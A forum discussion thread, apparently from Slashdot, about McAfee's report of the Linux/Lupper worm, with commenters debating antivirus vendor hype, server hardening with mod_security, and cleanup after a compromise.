Linux Lupper.Worm In the WIld 363
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
Remarkably Useless page. (Score:5, Interesting)
Second, how do you remove it? Quoth the page:
Been around earlier? (Score:1, Interesting)
Too many ifs (Score:5, Interesting)
which in practice means that your admin have died a couple of years ago but was never replaced.
Linux? (Score:2, Interesting)
Re:PHP exploit, not directly a linux problem? (Score:3, Interesting)
Please Rate This Worm Info!! (Score:3, Interesting)
Let Mcaffe know how well they're trolling.
Re:Too many ifs (Score:1, Interesting)
Re:How can we get some free press? (Score:2, Interesting)
It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...
Re:Before all teh MSFT fanboys jump on this, (Score:3, Interesting)
"Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed (even if you don't run Internet Explorer as your Web browser)."
And since MS included IE by default, enabled it by default, and made it almost impossible to uninstall, all you MS defenders are invited to take a long walk off a short pier. BTW, that update is less than 2 years old, so it's not like I'm really digging in the crates to find that one or making "OMG teh BSOD!" Win98 jokes.
Re:CONTINUE: (Score:3, Interesting)
Lupper? Isn't that a 3:00 pm meal... (Score:3, Interesting)
Re:So let me get this straight (Score:3, Interesting)
Linux has a smaller Market Share than Mac OS X, yet it's still getting targetted by virus writers?
... just so you don't need to feel left out.But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-windows users on a weekly basis (Maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
Re:CONTINUE: (Score:3, Interesting)
I find it kind of strange however that if you go to services/xmlrpc.php on my website, you get a webpage that is actually services.html. No services/xmlrpc.php or even services directory exists in my htdocs folder. Going to plain xmlrpc.php brings up a 404. However I scanned for open UDP ports and neither 7111 or 7222 are open, so according to McAfee I'm not infected. I'm probably just unknowledgable on what xmlrpc.php is, but it is still strange.
Re:It's not Windows (Score:2, Interesting)
Once any system is compromised, you have generally to assume that the attacker escalated their privileges using other exploits. If you had auditing enabled, you might be able to demonstrate that this did not happen, but if you had auditing enabled you probably reinstalled already!
The problem with these sorts of compromise, is in some shared hosting environments, where the end user could have installed vulnerable PHP. So doesn't really matter how good the admin, or OS is, unless the OS has specific facilities to mitigate this sort of attack.
I wouldn't take people seeing awstats attempts as proof of the worm, I've been seeing awstats exploit attempts for years, that is usually just run of the mill hacking attempts, semiautomated scanning, or earlier worms.
not a good practice.. (Score:1, Interesting)
Sure, 99% of the time, script kiddies are easy to clean up after. You might run into that 1% that make themselves root with an unpublished exploit, and install a kernel mod to hide themselves, and you think "oh, it's just some kiddies littering
That's happened to me exactly once in my 10+ year career, but once was too much!
Re:no login shell (Score:3, Interesting)
You should be using mod_security.
http://understudy.net/tutorials.php?name=wget [understudy.net] comes back failed You can run limited ablity shell accounts such as scponlyc (chrooted version of scponly)
And the servers I run on are all FreeBSD based.
Mod security can be found here:
http://modsecurity.org/ [modsecurity.org]
http://www.gotroot.com/tiki-index.php?page=mod_se
http://www.onlamp.com/pub/a/apache/2003/11/26/mod
IE is not cross-platform (Score:3, Interesting)